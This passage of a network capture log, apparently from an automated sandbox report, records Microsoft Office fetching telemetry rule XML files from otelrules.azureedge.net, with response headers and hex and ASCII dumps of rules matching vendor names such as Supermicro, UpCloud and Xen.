                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              78192.168.2.104978813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:55 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:56 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 475
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                              x-ms-request-id: 48855d02-a01e-0053-3f66-408603000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153156Z-174f7845968pf68xhC1EWRr4h80000000xcg00000000aq3p
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:56 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              79192.168.2.104978913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:56 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                              x-ms-request-id: 512a133a-001e-0066-4733-40561e000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153157Z-174f7845968ljs8phC1EWRe6en0000000x00000000009btz
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              80192.168.2.104979013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:57 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                              x-ms-request-id: 0f0f185b-001e-0065-4a37-400b73000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153157Z-174f7845968jrjrxhC1EWRmmrs0000000xc0000000000et9
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:57 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              81192.168.2.104979113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:57 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                              x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153157Z-174f7845968kdththC1EWRzvxn00000009dg00000000hnvh
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:58 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              82192.168.2.104979313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:57 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:58 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                              x-ms-request-id: a1da7612-c01e-0014-5d80-3fa6a3000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153158Z-174f7845968j6t2phC1EWRcfe80000000x5g00000000prqa
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:58 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              83192.168.2.104979413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:58 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:58 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 405
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                              x-ms-request-id: 1fa1d210-401e-0067-3791-3f09c2000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153158Z-174f7845968g6hv8hC1EWR1v2n000000054g000000002h15
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:58 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              84192.168.2.104979513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:59 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:59 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                              x-ms-request-id: 1a9a61cd-601e-0070-6771-40a0c9000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153159Z-174f78459684bddphC1EWRbht40000000wu000000000gs3v
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              85192.168.2.104979613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:59 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:59 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 174
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                              x-ms-request-id: 058c760e-201e-0051-7c6f-407340000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153159Z-174f7845968n2hr8hC1EWR9cag0000000wsg00000000cyq0
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:59 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              86192.168.2.104979713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:59 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:00 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1952
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                              x-ms-request-id: fdde7aaa-d01e-0028-2a8c-3f7896000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153200Z-174f7845968l4kp6hC1EWRe8840000000xeg000000003mg4
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
